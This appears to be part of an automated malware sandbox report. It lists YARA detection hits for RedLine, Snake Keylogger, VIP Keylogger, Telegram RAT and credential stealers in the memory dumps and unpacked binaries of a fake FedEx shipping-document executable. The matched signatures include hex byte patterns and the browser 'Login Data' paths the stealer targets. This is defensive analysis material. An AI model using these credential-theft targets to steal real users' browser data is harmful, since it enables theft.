00000007.00000002.3896174260.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76bb4:$a1: get_encryptedPassword 0x76b88:$a2: get_encryptedUsername 0x76c4c:$a3: get_timePasswordChanged 0x76b64:$a4: get_passwordField 0x76bca:$a5: set_encryptedPassword 0x76997:$a7: get_logins 0x721fe:$a10: KeyLoggerEventArgs 0x721cd:$a11: KeyLoggerEventArgsEventHandler 0x76a6b:$a13: _encryptedPassword
00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 7632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 7632	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 7632	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 7632	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b2e8:$a1: get_encryptedPassword 0x85c4a:$a1: get_encryptedPassword 0xb489c:$a1: get_encryptedPassword 0x278e31:$a1: get_encryptedPassword 0x2b2bc:$a2: get_encryptedUsername 0x85c1e:$a2: get_encryptedUsername 0xb4870:$a2: get_encryptedUsername 0x278e05:$a2: get_encryptedUsername 0x2b380:$a3: get_timePasswordChanged 0x85ce2:$a3: get_timePasswordChanged 0xb4934:$a3: get_timePasswordChanged 0x278ec9:$a3: get_timePasswordChanged 0x2b298:$a4: get_passwordField 0x85bfa:$a4: get_passwordField 0xb484c:$a4: get_passwordField 0x278de1:$a4: get_passwordField 0x2b2fe:$a5: set_encryptedPassword 0x85c60:$a5: set_encryptedPassword 0xb48b2:$a5: set_encryptedPassword 0x278e47:$a5: set_encryptedPassword 0x2b0d4:$a7: get_logins
Process Memory Space: hzwdvhxM.pif PID: 8004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8004	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8004	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8004	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19f30:$a1: get_encryptedPassword 0x31735:$a1: get_encryptedPassword 0x3d3e5:$a1: get_encryptedPassword 0x71684:$a1: get_encryptedPassword 0x19f04:$a2: get_encryptedUsername 0x31709:$a2: get_encryptedUsername 0x3d3b9:$a2: get_encryptedUsername 0x71658:$a2: get_encryptedUsername 0x19fc8:$a3: get_timePasswordChanged 0x317cd:$a3: get_timePasswordChanged 0x3d47d:$a3: get_timePasswordChanged 0x7171c:$a3: get_timePasswordChanged 0x19ee0:$a4: get_passwordField 0x316e5:$a4: get_passwordField 0x3d395:$a4: get_passwordField 0x71634:$a4: get_passwordField 0x19f46:$a5: set_encryptedPassword 0x3174b:$a5: set_encryptedPassword 0x3d3fb:$a5: set_encryptedPassword 0x7169a:$a5: set_encryptedPassword 0x19d1c:$a7: get_logins
Process Memory Space: hzwdvhxM.pif PID: 8172	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8172	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8172	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: hzwdvhxM.pif PID: 8172	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x169246:$a1: get_encryptedPassword 0x17a8c7:$a1: get_encryptedPassword 0x1cacb5:$a1: get_encryptedPassword 0x1e6a24:$a1: get_encryptedPassword 0x16921a:$a2: get_encryptedUsername 0x17a89b:$a2: get_encryptedUsername 0x1cac89:$a2: get_encryptedUsername 0x1e69f8:$a2: get_encryptedUsername 0x1692de:$a3: get_timePasswordChanged 0x17a95f:$a3: get_timePasswordChanged 0x1cad4d:$a3: get_timePasswordChanged 0x1e6abc:$a3: get_timePasswordChanged 0x1691f6:$a4: get_passwordField 0x17a877:$a4: get_passwordField 0x1cac65:$a4: get_passwordField 0x1e69d4:$a4: get_passwordField 0x16925c:$a5: set_encryptedPassword 0x17a8dd:$a5: set_encryptedPassword 0x1caccb:$a5: set_encryptedPassword 0x1e6a3a:$a5: set_encryptedPassword 0x169032:$a7: get_logins
Click to see the 87 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.hzwdvhxM.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.hzwdvhxM.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.hzwdvhxM.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.1.hzwdvhxM.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.hzwdvhxM.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.hzwdvhxM.pif.25c20000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.25c20000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.25c20000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
7.2.hzwdvhxM.pif.294202f6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.294202f6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.294202f6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.294202f6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.294202f6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.294202f6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
7.2.hzwdvhxM.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.hzwdvhxM.pif.287d0000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.287d0000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.287d0000.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
12.1.hzwdvhxM.pif.4da6c8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.1.hzwdvhxM.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2d540000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
7.1.hzwdvhxM.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
14.1.hzwdvhxM.pif.4da6c8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2a601216.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
7.2.hzwdvhxM.pif.2c440000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.2c440000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2c440000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
